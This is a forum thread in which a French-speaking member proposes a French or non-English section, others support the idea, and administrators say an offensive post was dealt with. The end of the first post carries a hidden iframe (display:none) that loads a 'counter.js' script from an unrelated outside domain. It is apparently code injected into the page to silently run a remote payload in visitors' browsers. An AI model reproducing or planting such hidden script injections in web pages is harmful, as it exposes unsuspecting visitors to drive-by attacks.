+ Reply to Thread
Results 1 to 10 of 10

Thread: French section

  1. #1
    Registered User
    Join Date
    04-17-2003
    Posts
    9

    French section

    Hi,

    May i suggest to creat a French section for this Awsome Forum.
    many poeple who i told about this Url would like to participate but they only can read and type in french and i'm sure than those french poeples who are living in europe could helps us alot on those products because it's aviable there since a few months before America.

    Thanks
    Dany
    ( p.s. Sorry for my bad english, my first language is french.)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    People are using Kyocera smartphones in Europe??
    Please visit my picture site: Robert-O-Rama :)

  3. #3
    Registered User
    Join Date
    08-27-2003
    Posts
    251
    Putting the retard comment aside...

    I think that a Non- English section might be a good idea. For anyone to post questions and answers in any language. I don't think we could make a forum for each language, but one that people would feel free to speak whatever they wish is definately possible.

    What do you think?
    -=Jimmyjoe=-

  4. #4
    Registered User
    Join Date
    04-17-2003
    Posts
    9
    Yes that could be useful for the most of nonenglish speaker around the world..

    And if you need help for the French section, i could make my part.

    I'm using this Forum as Unregistred user since a few months and i'm adicted to this Forum and his Producs now... hehehe

    See i will have my 7135 soon..

  5. #5
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by Danzer
    I'm using this Forum as Unregistred user since a few months and i'm adicted to this Forum and his Producs now... hehehe

    See i will have my 7135 soon..
    Cool! Welcome to the board! (as a member)
    Please visit my picture site: Robert-O-Rama :)

  6. #6
    Registered User dwdod's Avatar
    Join Date
    07-01-2001
    Location
    Metro Washington D.C. area
    Posts
    2,085
    Originally posted by jimmyjoe
    Putting the retard comment aside...

    I think that a Non- English section might be a good idea. For anyone to post questions and answers in any language. I don't think we could make a forum for each language, but one that people would feel free to speak whatever they wish is definately possible.

    What do you think?
    Great idea. It would add to the prestigue of the forum to have an "international" section! Go for it!
    Dave

  7. #7
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    its cool to see one piece of technology bring two different cultures together...

  8. #8
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    I think it is an excellent idea to have other languages here. And please do not take any offense from the idiot whose post may or not still be in this thread. He only speaks for himself, and not any of the rest of us. All cultures are welcomed here with open arms.
    ~'kito
    pdaPhoneHome Moderator

  9. #9
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Yep... all cultures and languages are welcome! (how do we moderate that board? ). Is there a vBulletin plug-in to translate languages automatically maybe?
    Please visit my picture site: Robert-O-Rama :)

  10. #10
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    Originally posted by Markito
    I think it is an excellent idea to have other languages here. And please do not take any offense from the idiot whose post may or not still be in this thread. He only speaks for himself, and not any of the rest of us. All cultures are welcomed here with open arms.
    i second that...

    FYI, offending posts have been dealt with.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts